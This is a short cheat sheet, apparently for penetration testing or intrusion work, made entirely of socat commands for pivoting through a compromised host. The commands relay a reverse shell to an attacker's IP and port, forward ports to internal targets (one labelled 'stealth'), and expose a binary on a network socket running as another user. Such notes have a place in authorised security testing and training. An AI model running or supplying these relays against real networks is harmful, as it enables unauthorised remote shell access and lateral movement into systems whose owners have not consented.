% forward, proxy

# Reverse shell relay (on pivot machine)
socat tcp-l:<pivotlocalport> tcp:<attackip>:<attackport> &

# Port Forwarding on pivot host to target
socat tcp-l:<pivotport>,fork,reuseaddr tcp:<targetip>:<targetport>

# Stealth/Quiet Port Forwarding on pivot host to target
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
echo "socat tcp:<attackip>:8001 tcp:<targetip>:<targetport>,fork &"

# Expose binary via socket as another user
socat TCP4-LISTEN:<LPORT>,reuseaddr,su=<USR>,fork EXEC:<BINPATH>,stderr
